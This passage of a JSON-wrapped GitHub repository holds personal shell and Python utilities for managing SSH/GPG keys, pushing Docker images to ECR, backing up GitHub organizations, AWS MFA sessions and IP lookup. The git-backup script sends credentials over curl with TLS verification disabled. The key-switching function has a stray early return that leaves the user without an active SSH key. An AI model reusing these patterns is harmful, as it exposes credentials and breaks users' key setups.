'help'|'--help'|-h|h|'') key_manager_help;;\n *) echo -e \"$ERR '$_cmd' is not a valid command $CLR\" && return 1;;\n esac\n}\n\nkey_manager_new() {\n local _key_type=$1\n [[ $_key_type ]] && shift\n\n case $_key_type in\n 'gpg') key_manager_new_gpg $@;;\n 'ssh') key_manager_new_ssh $@;;\n '') echo -e \"$ERR must pass a key type $CLR\" && return 1;;\n *) echo -e \"$ERR '$_key_type' is not a valid key type $CLR\" && return 1;;\n esac\n}\n\nkey_manager_extend() {\n local _key_type=$1\n [[ $_key_type ]] && shift\n\n case $_key_type in\n 'gpg') key_manager_extend_gpg $@;;\n 'ssh') echo -e \"$ERR not a valid key type $CLR\" && return 1;;\n '') echo -e \"$ERR must pass a key type $CLR\" && return 1;;\n *) echo -e \"$ERR '$_key_type' is not a valid key type $CLR\" && return 1;;\n esac\n}\n\nkey_manager_new_gpg() {\n local email=$1 && shift\n local name=$@ tmp=mktemp\n [[ -z \"$email\" ]] && echo -e \"$ERR Must pass email $CLR\" && exit 1\n [[ -z \"$name\" ]] && echo -e \"$ERR Must pass name $CLR\" && exit 1\n [[ `gpg -k` == *\"$email\"* ]] && echo -e \"$ERR Key for $email already exists $CLR\" && exit 1\n\n read -s -p \"Enter a passphrase: \" passphrase\n echo \"\n Key-Type: 1\n Key-Length: 4096\n Subkey-Type: 1\n Subkey-Length: 4096\n Name-Real: $name\n Name-Email: $email\n Passphrase: $passphrase\n Expire-Date: `next_year`0101T000000\n \"> $tmp\n gpg --batch --generate-key $tmp\n}\n\nkey_manager_extend_gpg() {\n local email=$1\n}\n\nkey_manager_new_ssh() {\n local email=$1\n local new_key_file=`sanitize $email`\n [[ -z \"$email\" ]] && echo -e \"$ERR Must pass email $CLR\" && exit 1\n existing_key_file=`grep -r \"$email\" ~/.ssh | cut -d\":\" -f1`\n [[ $existing_key_file ]] && echo -e \"$ERR Key for $email already exists in $existing_key_file $CLR\" && exit 1\n\n ssh-keygen -t rsa -C \"$email\" -f ~/.ssh/$new_key_file\n echo -e \"Created new key 
files:\\n~/.ssh/$new_key_file\\n~/.ssh/$new_key_file.pub\"\n}\n\nkey_manager_use() {\n set -e\n local email=$1\n [[ -z \"$email\" ]] && echo -e \"$ERR Must pass email $CLR\" && exit 1\n\n ssh_public_key_file=`grep -r \"$email\" ~/.ssh | cut -d\":\" -f1`\n ssh_private_key_file=`echo $ssh_public_key_file | sed 's/\\.pub//g'`\n if [[ -z $ssh_public_key_file ]]; then\n echo -e \"$ERR Could not find SSH key for $email (no files containing that email exist in ~/.ssh) $CLR\"\n return 1\n fi\n if [[ `basename $ssh_public_key_file` == \"id_rsa.pub\" ]]; then\n echo -e \"$ERR Already using SSH key for $email (~/.ssh/id_rsa.pub contains that email) $CLR\"\n return 1\n fi\n if ! [[ -f $ssh_private_key_file ]]; then\n echo -e \"$ERR Could not find private SSH key file for public SSH key file `basename $ssh_public_key_file` (`basename $ssh_private_key_file` does not exist in ~/.ssh) $CLR\"\n return 1\n fi\n\n current_ssh_email=`cat ~/.ssh/id_rsa.pub | cut -d' ' -f3`\n current_ssh_email_sanitized=`sanitize $current_ssh_email`\n current_ssh_public_key_file_new_path=\"~/.ssh/$current_ssh_email_sanitized.pub\"\n current_ssh_private_key_file_new_path=\"~/.ssh/$current_ssh_email_sanitized\"\n if [[ -f $current_ssh_public_key_file_new_path ]]; then\n echo -e \"$ERR Cannot move ~/id_rsa.pub to $current_ssh_public_key_file_new_path (file with that name already exists) $CLR\"\n return 1\n fi\n if [[ -f $current_ssh_private_key_file_new_path ]]; then\n echo -e \"$ERR Cannot move ~/id_rsa to $current_ssh_private_key_file_new_path (file with that name already exists) $CLR\"\n return 1\n fi\n\n # key_manager_backup\n\n mv ~/.ssh/id_rsa.pub $current_ssh_public_key_file_new_path\n mv ~/.ssh/id_rsa $current_ssh_private_key_file_new_path\n return\n mv $ssh_public_key_file ~/.ssh/id_rsa.pub\n mv $ssh_private_key_file ~/.ssh/id_rsa\n\n echo \"Now using SSH key for $email\"\n}\n\nkey_manager_configure_git_signing() {\n gpg --list-secret-keys --keyid-format LONG\n # signingkey=`git config user.signingkey`\n # gpg --list-keys $signingkey\n # git config --global user.signingkey 3AA5C34371567BD2\n}\n\nkey_manager_backup() {\n set -e\n local timestamp=`date -u +%Y-%m-%dT%H%M%S`\n local backup_path=~/.key_manager/backups\n local gpg_backup_path=$backup_path/dot-gnupg/$timestamp\n local ssh_backup_path=$backup_path/dot-ssh/$timestamp\n echo \"Creating backup with timestamp $timestamp\"\n mkdir -p $ssh_backup_path\n rsync -av --no-specials --no-devices ~/.ssh/ $ssh_backup_path/\n mkdir -p $gpg_backup_path\n rsync -av --no-specials --no-devices ~/.gnupg/ $gpg_backup_path/\n echo \"Backed up gpg to $ssh_backup_path\"\n echo \"Backed up ssh to $gpg_backup_path\"\n}\n\nkey_manager $@\n\n"
},
{
"alpha_fraction": 0.5926828980445862,
"alphanum_fraction": 0.6019512414932251,
"avg_line_length": 32.6065559387207,
"blob_id": "6c0ca688a689438491f4fd31bf27c6c4dbb9d2f4",
"content_id": "f16e20f19eef92b7fd84a82455ce6502c22e3501",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 2050,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 61,
"path": "/bin/ecs-update-image",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\n\n# Builds from scratch, tags, and pushes a Dockerfile to an ECS repository\n# Add `# REPO: repo/name` to the first line of the Dockerfile to specify which\n# repository to push the built image to (also controls tagging)\n\nAWS_ACCOUNT_ID=`aws sts get-caller-identity | jp -u Account`\nAWS_REGION=`aws configure get region`\n\necho \"Using AWS account $AWS_ACCOUNT_ID in $AWS_REGION...\"\n\nconfirm() {\n [[ $_auto_yes ]] && return 1\n [[ $_silent ]] && return 0\n # xaple: confirm \"Do the thing?\" && [ \"$?\" == 0 ] && exit 1\n while true; do\n read -r -p \"${1:-Are you sure?} [y/n]: \" RESP\n case $RESP in\n [yY][eE][sS]|[yY]) return 1;;\n [nN][oO]|[nN]) return 0;;\n *) echo \"Please enter y(es) or n(o)\";;\n esac\n done\n}\n\nDOCKER_FILES=`find $PWD -name Dockerfile`\nfor file in $DOCKER_FILES; do\n\n echo \"Processing $file...\"\n\n FILE_HEAD=`head -n1 $file`\n if [[ $FILE_HEAD == *'# REPO: '* ]]; then\n REPO_NAME=\"`echo $FILE_HEAD | awk '{print $3}'`\"\n else\n REPO_NAME=\"`basename $(dirname $file)`\"\n fi\n\n confirm \"Do you want to rebuild $file from scratch?\"\n if [[ \"$?\" == 1 ]]; then\n docker build --force-rm --no-cache -t $REPO_NAME .\n fi\n\n REMOTE_REPO=\"$AWS_ACCOUNT_ID.dkr.ecr.$AWS_REGION.amazonaws.com/$REPO_NAME:latest\"\n confirm \"Tag and push local $REPO_NAME:latest to $REMOTE_REPO?\"\n if [[ \"$?\" == 1 ]]; then\n echo \"Tagging $file as $REPO_NAME:latest\"\n docker tag $REPO_NAME:latest $AWS_ACCOUNT_ID.dkr.ecr.$AWS_REGION.amazonaws.com/$REPO_NAME:latest\n echo \"Pushing $REPO_NAME:latest to $REMOTE_REPO\"\n docker push $REMOTE_REPO\n if [ $? != 0 ]; then\n GET_ECR_LOGIN=\"aws ecr get-login --no-include-email --region $AWS_REGION\"\n confirm \"Push failed, do you want to run '$GET_ECR_LOGIN'?\"\n [ $? == 1 ] && ECR_LOGIN=\"`$GET_ECR_LOGIN`\" || exit 1\n confirm \"Do you want to run '$ECR_LOGIN'?\"\n [ $? == 1 ] && `\"$ECR_LOGIN\"` || exit 1\n [ $? == 0 ] && confirm \"Do you want to try pushing again?\"\n [ $? == 1 ] && docker push $REMOTE_REPO || exit 1\n fi\n fi\n\ndone\n"
},
{
"alpha_fraction": 0.5763813853263855,
"alphanum_fraction": 0.5904658436775208,
"avg_line_length": 26.969696044921875,
"blob_id": "3de669cac6be50aa496a7a859cbc76f43768ade8",
"content_id": "15112feef0bd5856757e0ac94e6a81df55c319ed",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 923,
"license_type": "permissive",
"max_line_length": 108,
"num_lines": 33,
"path": "/bin/sshp",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env zsh\n\n# Open an interactive shell or run a command through a tunnel using another SSH server as a proxy\n#\n# Usage:\n# sshp <PROXY HOST> <DESTINATION HOST>\n# sshp <PROXY HOST> <DESTINATION HOST> <COMMAND>\n#\n# Options:\n# help|-h show this help menu\n\n[[ $CLR ]] || CLR='\\e[0m'\n[[ $WRN ]] || WRN='\\e[1;33mWARNING:'\n[[ $ERR ]] || ERR='\\e[1;31mERROR:'\n\nSSH_PROXY_SCRIPT_PATH=\"$0\"\n\nssh_proxy_help() {\n sed '/^#\\!.*/d' $SSH_PROXY_SCRIPT_PATH | sed '/^$/d' | sed -n '/^[^#]*$/!p;//q' | sed 's/^# //g;s/^#//g'\n exit 0\n}\n\ncase $1 in\n 'help'|'--help'|-h|h|'') ssh_proxy_help $@;;\nesac\n\nlocal tunnel_host=$1 destination_host=$2 errors\n\n[[ -z $tunnel_host ]] && errors=\"$ERR tunnel host must be set$CLR\\n\"\n[[ -z $destination_host ]] && errors=\"$errors$ERR destination host must be set$CLR\"\n[[ $errors ]] && echo -e \"$errors\" && exit 1\n\nssh $destination_host -o \"proxycommand ssh -W %h:%p $tunnel_host\"\n"
},
{
"alpha_fraction": 0.5017793774604797,
"alphanum_fraction": 0.5124555230140686,
"avg_line_length": 24.545454025268555,
"blob_id": "536128996632bd4f838fc0e6489c503adb3b5709",
"content_id": "f8dbb3451f4ff9b7386be9102156cec0bd3876d0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 281,
"license_type": "permissive",
"max_line_length": 57,
"num_lines": 11,
"path": "/includes/tunnels.sh",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "tunnels() {\n local _tunnel_pids\n _tunnel_pids=`ps aux | grep [s]sh | awk '{print $2}'`\n if ! [[ $_tunnel_pids ]]; then\n echo \"No SSH tunnels found\"\n fi\n case $1 in\n \"list\" ) echo $_tunnel_pids;;\n \"kill\" ) sudo kill -9 $_tunnel_pids;;\n esac\n}\n"
},
{
"alpha_fraction": 0.6664025187492371,
"alphanum_fraction": 0.6711568832397461,
"avg_line_length": 26.434782028198242,
"blob_id": "26c71fcc8df0a9ff6640fc6d661e6a2f974a69ee",
"content_id": "10a4d0be006ba30e4b2d20dc6b2f7278b33d09a4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1262,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 46,
"path": "/bin/git-sync",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\n\n# A simple bash script to run git pull in a directory of repos. Automatically\n# detects whether each directory is a git repository, and can optionally\n# checkout a branch before pulling using the `-b <branch-name>` argument.\n\n# Save original working directory\n_ORIGINAL_PWD=\"$PWD\"\n\n# Parse args\nwhile getopts \":b:\" opt; do\n case $opt in\n b) SYNC_BRANCH=$OPTARG;;\n \\?) echo \"Invalid option: -$OPTARG\" >&2;;\n esac\ndone\n\n# Find all git repos in the current directory or pull the current directory\nREPOS_DIR=\"$PWD\"\nif [ -d \"$REPOS_DIR/.git\" ]; then\n REPOS=\"$REPOS_DIR\"\nelse\n REPOS=\"`find $REPOS_DIR -name .git -maxdepth 2 -type d`\"\nfi\n\n# Sort repo list alphabetically\nREPOS=`echo \"$REPOS\" | sort --ignore-case`\n\n# CD into each directory, optionally checkout a branch, and pull\nfor REPO in $REPOS; do\n # git branch --short\n echo \"Pulling `basename $(dirname $REPO)`\"\n cd `dirname $REPO`\n [ $SYNC_BRANCH ] && git checkout $SYNC_BRANCH\n __pull_results=`git pull 2>&1`\n if [[ $? != 0 ]]; then\n echo \"Error: $REPO could not be pulled\"\n printf \"$__pull_results\"\n exit 1\n elif [[ \"$__pull_results\" != \"Already up-to-date.\" ]]; then\n printf \"$__pull_results\"\n fi\ndone\n\n# Go back to the original directory\ncd $_ORIGINAL_PWD\n"
},
{
"alpha_fraction": 0.693965494632721,
"alphanum_fraction": 0.693965494632721,
"avg_line_length": 22.200000762939453,
"blob_id": "a7b12c2e8469c6a66b76b7f4142173a41b72c5da",
"content_id": "189231fbca9170be272a9891d700143e938adbbd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 232,
"license_type": "permissive",
"max_line_length": 112,
"num_lines": 10,
"path": "/README.md",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "# Chelys\n\nChelys is a utility for managing the stuff upon which my world rests.\n\n## Installation\n\n**ZSH**\n```shell\ngit clone https://github.com/MartinHarding/chelys.git ~/.chelys && echo 'source ~/.chelys/chelys.sh' >> ~/.zshrc\n```\n"
},
{
"alpha_fraction": 0.6990740895271301,
"alphanum_fraction": 0.7037037014961243,
"avg_line_length": 42.20000076293945,
"blob_id": "cffef823ffc32f2a60ceeede45dd3c9fb5599ec1",
"content_id": "3bd9d2df6a7bab17ace7cea9f19c6262937919f9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 216,
"license_type": "permissive",
"max_line_length": 173,
"num_lines": 5,
"path": "/includes/aliases.sh",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env zsh\n\nalias ls='ls -FGlAh'\n\nalias ecr_login='docker login -u AWS -p `aws ecr get-login-password` \"https://`aws sts get-caller-identity --query 'Account' --output text`.dkr.ecr.us-east-1.amazonaws.com\"'\n"
},
{
"alpha_fraction": 0.5794085264205933,
"alphanum_fraction": 0.5872581005096436,
"avg_line_length": 47.91071319580078,
"blob_id": "1e318bd9f191de1addef0c98f2d661981470fd40",
"content_id": "2aa3e18b0d5d130199912f627132c3fd2d762b22",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 5478,
"license_type": "permissive",
"max_line_length": 174,
"num_lines": 112,
"path": "/bin/git-backup",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "#!/bin/zsh\n\n# A simple script to backup an organization's GitHub repositories, wikis, issues, and pull requests.\n# Sources: https://gist.github.com/darktim/5582423 https://gist.github.com/rodw/3073987\n\n[[ -z \"$1\" ]] && echo \"Please pass in an Organization or User\" && exit 1\n[[ -z \"$GHBU_UNAME\" ]] && echo \"Please set GHBU_UNAME\" && exit 1\n[[ -z \"$GHBU_PASSWD\" ]] && echo \"Please set GHBU_PASSWD\" && exit 1\n\nGHBU_BACKUP_DIR=${GHBU_BACKUP_DIR-\"github-backups\"} # where to place the backup files\nGHBU_ORG=$1 # the GitHub organization whose repos will be backed up\nGHBU_UNAME=$GHBU_UNAME # the username of a GitHub account (to use with the GitHub API)\nGHBU_PASSWD=$GHBU_PASSWD # the password for that account\nGHBU_GITHOST=${GHBU_GITHOST-\"https://${GHBU_UNAME}:${GHBU_PASSWD}@github.com\"} # the GitHub hostname (see notes)\nGHBU_PRUNE_OLD=${GHBU_PRUNE_OLD-false} # when `true`, old backups will be deleted\nGHBU_PRUNE_AFTER_N_DAYS=${GHBU_PRUNE_AFTER_N_DAYS-365} # the min age (in days) of backup files to delete\nGHBU_SILENT=${GHBU_SILENT-false} # when `true`, only show error messages\nGHBU_YES=${GHBU_YES-false} # when `true`, will skip prompts\nGHBU_API=${GHBU_API-\"https://api.github.com\"} # base URI for the GitHub API\nGHBU_GIT_CLONE_CMD=(\"git\" \"clone\" \"--quiet\" \"--mirror\" \"${GHBU_GITHOST}/\") # base command to use to clone GitHub repos\n\nTSTAMP=`date '+%Y-%m-%dT%H_%M_%S%z'`\n\n# The function `check` will exit the script if the given command fails.\nfunction check {\n \"$@\"\n exit_code=$?\n if [ $exit_code -ne 0 ]; then\n echo \"ERROR: Encountered error (${exit_code}) while running the following:\" >&2\n echo \" $@\" >&2\n echo \" (at line ${BASH_LINENO[0]} of file $0.)\" >&2\n echo \" Aborting.\" >&2\n exit $exit_code\n fi\n}\n\n# The function `tgz` will create a gzipped tar archive of the specified file ($1) and then remove the original\n# the option -P omits the error message tar: Removing leading '/' from member names\nfunction tgz {\n check tar zcPf $1.tar.gz $1 && check rm -rf $1\n}\n\n$GHBU_SILENT || (echo \"\" && echo \"=== INITIALIZING ===\" && echo \"\")\n\n$GHBU_SILENT || echo \"Using backup directory $GHBU_BACKUP_DIR\"\ncheck mkdir -p $GHBU_BACKUP_DIR\n\n$GHBU_SILENT || echo \"Fetching list of repositories for ${GHBU_ORG}...\"\n# cycling through pages as github API limits entries to 30/100 per page...\nPAGE=0\nwhile true; do\n let PAGE++\n $GHBU_SILENT || echo \"getting page ${PAGE}\"\n REPOLIST_TMP=\"`check curl --silent -u $GHBU_UNAME:$GHBU_PASSWD ${GHBU_API}/orgs/${GHBU_ORG}/repos\\?page=${PAGE}\\&per_page=10 -q -k | jq -r '.[] .name'`\"\n if [ -z \"${REPOLIST_TMP}\" ]; then break; fi\n for REPO in ${(f)REPOLIST_TMP}; do\n REPOLIST+=(\"$REPO\")\n done\ndone\n\n$GHBU_SILENT || echo -e \"found `echo $REPOLIST | wc -w` repositories.\"\nfor REPO in $REPOLIST; do\n [[ \"$GHBU_YES\" == true ]] && echo \" Will backup: $REPO\" && continue\n while true; do\n read \"?Do you want to backup '$REPO'? 
(y/n): \" RESPONSE\n if [[ $RESPONSE == 'y'* ]]; then\n BACKUP_REPOLIST+=(\"$REPO\")\n break\n elif [[ $RESPONSE == 'n'* ]]; then\n SKIP_REPOLIST+=(\"$REPO\")\n break\n else\n echo \"Please enter y or n\"\n fi\n done\ndone\n\n\necho \"Preparing to backup `echo $BACKUP_REPOLIST | wc -w | awk '{print $1}'` repos:\"\nfor REPO in $BACKUP_REPOLIST; do\n echo \"> $REPO\"\ndone\n\n$GHBU_SILENT || (echo \"\" && echo \"=== BACKING UP ===\" && echo \"\")\n\nfor REPO in $BACKUP_REPOLIST; do\n $GHBU_SILENT || echo \"Backing up ${GHBU_ORG}/${REPO}\"\n check ${GHBU_GIT_CLONE_CMD}${GHBU_ORG}/${REPO}.git ${GHBU_BACKUP_DIR}/${GHBU_ORG}-${REPO}-${TSTAMP}.git \\\n && tgz ${GHBU_BACKUP_DIR}/${GHBU_ORG}-${REPO}-${TSTAMP}.git\n\n $GHBU_SILENT || echo \"Backing up ${GHBU_ORG}/${REPO}.wiki (if any)\"\n ${GHBU_GIT_CLONE_CMD}${GHBU_ORG}/${REPO}.wiki.git ${GHBU_BACKUP_DIR}/${GHBU_ORG}-${REPO}.wiki-${TSTAMP}.git 2>/dev/null \\\n && tgz ${GHBU_BACKUP_DIR}/${GHBU_ORG}-${REPO}.wiki-${TSTAMP}.git\n\n $GHBU_SILENT || echo \"Backing up ${GHBU_ORG}/${REPO} pulls\"\n check curl --silent -u $GHBU_UNAME:$GHBU_PASSWD \"${GHBU_API}/repos/${GHBU_ORG}/${REPO}/pulls?state=all\" -q > ${GHBU_BACKUP_DIR}/${GHBU_ORG}-${REPO}.pulls-${TSTAMP}.json \\\n && tgz ${GHBU_BACKUP_DIR}/${GHBU_ORG}-${REPO}.pulls-${TSTAMP}.json\n\n $GHBU_SILENT || echo \"Backing up ${GHBU_ORG}/${REPO} issues\"\n check curl --silent -u $GHBU_UNAME:$GHBU_PASSWD \"${GHBU_API}/repos/${GHBU_ORG}/${REPO}/issues?state=all\" -q > ${GHBU_BACKUP_DIR}/${GHBU_ORG}-${REPO}.issues-${TSTAMP}.json \\\n && tgz ${GHBU_BACKUP_DIR}/${GHBU_ORG}-${REPO}.issues-${TSTAMP}.json\ndone\n\nif $GHBU_PRUNE_OLD; then\n $GHBU_SILENT || (echo \"\" && echo \"=== PRUNING ===\" && echo \"\")\n $GHBU_SILENT || echo \"Pruning backup files ${GHBU_PRUNE_AFTER_N_DAYS} days old or older.\"\n $GHBU_SILENT || echo \"Found `find $GHBU_BACKUP_DIR -name '*.tar.gz' -mtime +$GHBU_PRUNE_AFTER_N_DAYS | wc -l` files to prune.\"\n find $GHBU_BACKUP_DIR -name '*.tar.gz' -mtime +$GHBU_PRUNE_AFTER_N_DAYS -exec rm -fv {} > /dev/null \\;\nfi\n\n$GHBU_SILENT || (echo \"\" && echo \"=== DONE ===\" && echo \"\")\n$GHBU_SILENT || (echo \"GitHub backup completed.\" && echo \"\")\n"
},
{
"alpha_fraction": 0.5439519286155701,
"alphanum_fraction": 0.5533433556556702,
"avg_line_length": 37.5797119140625,
"blob_id": "e8e16201c7155b6c7dfbc99a5d5fd657df9053f3",
"content_id": "ad779f302baf8db523c5ed7e5882e27871a7f418",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 2662,
"license_type": "permissive",
"max_line_length": 121,
"num_lines": 69,
"path": "/bin/aws-mfa-session",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env zsh\n\n# Create a session using an MFA device for the AWS CLI\n#\n# Usage:\n# aws-mfa-session -o <OUTPUT PROFILE NAME> -c <OTP CODE>\n#\n# Options:\n# -h|--help show this help menu\n# -d|--device <ARN> AWS MFA device ARN\n# -s|--save <NAME> save the session to a named profile instead of returning the JSON info\n# -p|--profile <NAME> profile to use when creating the session\n# -t|--topt <TOTP> time-based one time password code\n\nAWS_MFA_SESSION_SCRIPT_PATH=\"$0\"\n\naws_mfa_session_help() {\n sed '/^#\\!.*/d' $AWS_MFA_SESSION_SCRIPT_PATH | sed '/^$/d' | sed -n '/^[^#]*$/!p;//q' | sed 's/^# //g;s/^#//g'\n}\n\naws_mfa_session() {\n local profile=\"default\" \\\n totp_code \\\n save \\\n device_arn \\\n mfa_device_info \\\n session_info \\\n access_key_id \\\n secret_access_key \\\n session_token opt\n\n while true; do\n case \"$1\" in\n -h|--help|help|h) aws_mfa_session_help && exit 0;;\n -d|--device) [[ \"$2\" == \"\" ]] && echo \"-d requires an argument\" && exit 1 || mfa_device_arn=\"$2\" && shift 2;;\n -s|--save ) [[ \"$2\" == \"\" ]] && echo \"-o requires an argument\" && exit 1 || save=\"$2\" && shift 2;;\n -p|--profile ) [[ \"$2\" == \"\" ]] && echo \"-p requires an argument\" && exit 1 || profile=\"$2\" && shift 2;;\n -t|--topt ) [[ \"$2\" == \"\" ]] && echo \"-t requires an argument\" && exit 1 || totp_code=\"$2\" && shift 2;;\n * ) break;;\n esac\n done\n\n [ $totp_code -z ] && read \"?Enter TOTP Code: \" totp_code\n if [ $mfa_device_arn -z ]; then\n mfa_device_info=$(aws iam list-mfa-devices --profile $profile)\n [ $? != 0 ] && echo \"$mfa_device_info\" && exit 1\n mfa_device_arn=$(echo $mfa_device_info | jp -u \"MFADevices[0].SerialNumber\")\n [ $? != 0 ] && echo \"$mfa_device_arn\" && exit 1\n fi\n\n session_info=$(aws sts get-session-token --serial-number $mfa_device_arn --token-code $totp_code --profile $profile)\n\n if [ $save ]; then\n access_key_id=$(echo $session_info | jp -u \"Credentials.AccessKeyId\")\n secret_access_key=$(echo $session_info | jp -u \"Credentials.SecretAccessKey\")\n session_token=$(echo $session_info | jp -u \"Credentials.SessionToken\")\n\n aws configure set aws_access_key_id $access_key_id --profile $save\n aws configure set aws_secret_access_key $secret_access_key --profile $save\n aws configure set aws_session_token $session_token --profile $save\n aws configure set region us-east-1 --profile $save\n\n echo $save\n else\n echo $session_info\n fi\n}\n\naws_mfa_session $@\n"
},
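The aws-mfa-session helper above boils down to one STS call: exchange an MFA device serial plus a TOTP code for temporary credentials, then store them under a named profile. A rough Python sketch of the same exchange using boto3, assuming boto3 is installed; the serial ARN and code in the usage line are placeholders:

```python
import boto3

def mfa_session(mfa_serial, totp_code, profile="default"):
    """Trade an MFA code for temporary credentials, as the zsh helper does."""
    sts = boto3.Session(profile_name=profile).client("sts")
    resp = sts.get_session_token(SerialNumber=mfa_serial, TokenCode=totp_code)
    # Contains AccessKeyId, SecretAccessKey, SessionToken and Expiration.
    return resp["Credentials"]

# creds = mfa_session("arn:aws:iam::123456789012:mfa/someone", "123456")
```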
{
"alpha_fraction": 0.5511064529418945,
"alphanum_fraction": 0.5535651445388794,
"avg_line_length": 29.287233352661133,
"blob_id": "f50a1bee9f8b874d44ac9bde11161344c4207984",
"content_id": "cc07abd3950f41ef71fce88fb619adc12ea922d7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2847,
"license_type": "permissive",
"max_line_length": 84,
"num_lines": 94,
"path": "/bin/ip",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\n\"\"\"Display IP addresses assigned to various network interfaces.\n\nUsage:\n ip\n ip (-i | --interface) <NAME>\n ip (-h | --help)\n ip --version\n\nOptions:\n -h --help Show this screen.\n --version Show version.\n -i --interface INTERFACE Show specific interface address.\n -a --all Show all interface addresses.\n -v --verbose Display additional information for interface.\n\n\"\"\"\n\n# from docopt import docopt\n\n# if __name__ == '__main__':\n# arguments = docopt(__doc__, version='ip 1.0')\n# print(arguments)\n\nimport argparse\nimport netifaces\n\nfrom os import name\nfrom os import popen\n\ndescription=\"List IP addresses for interfaces.\"\nargparser = argparse.ArgumentParser(description=description)\nargparser.add_argument(\"-l, --list\",\n dest=\"list\",\n action=\"store_true\",\n help=\"list all interfaces\")\nargparser.add_argument(\"-i, --interfaces\",\n dest=\"interfaces\",\n help=\"list a subset of interfaces\")\nargparser.add_argument(\"-v, --verbose\",\n dest=\"verbose\",\n action=\"store_true\",\n help=\"show labels for each interface\")\noptions = argparser.parse_args()\n\n# Default to show just wan address\ninterfaces = ['wan']\nif options.interfaces and options.list:\n print(\"Error: you may not use the '-i' and '-l' options together\")\nelif options.list:\n interfaces = ['wan']+netifaces.interfaces()\nelif options.interfaces:\n interfaces = options.interfaces.split(' ')\n\n# Loop through passed interfaces\nfor interface in interfaces:\n\n # don't show localhost address\n if interface == 'lo0':\n continue\n\n # Get WAN address\n if interface == 'wan':\n if name == 'posix':\n wan = popen(\n \"dig +short myip.opendns.com @resolver1.opendns.com\").read().strip()\n else:\n # Windows doesn't have dig\n import urllib2\n req = urllib2.Request('https://ifconfig.co/ip')\n response = urllib2.urlopen(req)\n wan = response.read().strip()\n\n # Print and exit\n if options.verbose:\n print(\"wan: %s\" % (wan))\n else:\n print(wan)\n\n # Get other interface addresss info\n else:\n try:\n interfaceInfo = netifaces.ifaddresses(interface)\n if netifaces.AF_INET in interfaceInfo:\n for i in interfaceInfo[netifaces.AF_INET]:\n if 'addr' in i:\n if options.verbose:\n print(\"%s: %s\" % (interface, i['addr']))\n else:\n print(i['addr'])\n\n except Exception as e:\n print(\"Error: (%s) %s\" % (interface, e))\n"
},
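The per-interface branch of the script is essentially two netifaces calls: ifaddresses() and the AF_INET key. A condensed sketch of that lookup, assuming netifaces is installed:

```python
import netifaces

def ipv4_addresses():
    """Map each interface name to its IPv4 addresses, as the loop above does."""
    result = {}
    for iface in netifaces.interfaces():
        info = netifaces.ifaddresses(iface)
        if netifaces.AF_INET in info:
            result[iface] = [a["addr"] for a in info[netifaces.AF_INET] if "addr" in a]
    return result

# print(ipv4_addresses())  # e.g. {'lo0': ['127.0.0.1'], 'en0': ['192.168.1.5']}
```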
{
"alpha_fraction": 0.5379388332366943,
"alphanum_fraction": 0.5390713214874268,
"avg_line_length": 26.59375,
"blob_id": "fd3fc02a275cf2ffe621510add4e3e2d1171ab13",
"content_id": "609010c31a3c17e08ac2982fd34ffdf2c1e67dc6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 883,
"license_type": "permissive",
"max_line_length": 72,
"num_lines": 32,
"path": "/includes/search.sh",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env zsh\n\nsearch() {\n local _query _engine _arg\n _engine='google'\n for _arg in $@; do\n if [ $_arg = '-e' ]; then\n _engine=\"$2\"\n shift; shift\n fi\n done\n\n case $_engine in\n 'google') _engine='https://www.google.com/search?q=';;\n 'duckduckgo') _engine='https://duckduckgo.com/?q=';;\n 'stackoverflow') _engine='https://stackoverflow.com/search?q=';;\n esac\n\n _query=`echo \"$*\" | sed -e 's/\\ /+/g'`\n [[ $_query ]] || _query=$(basename `pwd`)\n\n case \"`uname -s`\" in\n \"Darwin\") open \"$_engine$_query\";;\n \"Linux\") xdg-open \"$_engine$_query\";;\n \"CYGWIN\"|\"MINGW\") start chrome \"$_engine$_query\";;\n esac\n}\n\n# Quick search aliases\nalias ggl=\"search -e google\" # Google\nalias ddg=\"search -e duckduckgo\" # DuckDuckGo\nalias sov=\"search -e stackoverflow\" # Stack Overflow\n"
},
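search() builds a query URL by swapping spaces for '+' and hands it to the platform's opener. A Python sketch of the same idea; quote_plus also escapes characters the sed substitution above would pass through unencoded:

```python
import webbrowser
from urllib.parse import quote_plus

ENGINES = {
    "google": "https://www.google.com/search?q=",
    "duckduckgo": "https://duckduckgo.com/?q=",
    "stackoverflow": "https://stackoverflow.com/search?q=",
}

def search(query, engine="google"):
    """Open the query in the default browser, like the zsh function above."""
    webbrowser.open(ENGINES[engine] + quote_plus(query))

# search("zsh parameter expansion", engine="duckduckgo")
```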
{
"alpha_fraction": 0.7594936490058899,
"alphanum_fraction": 0.7594936490058899,
"avg_line_length": 38.5,
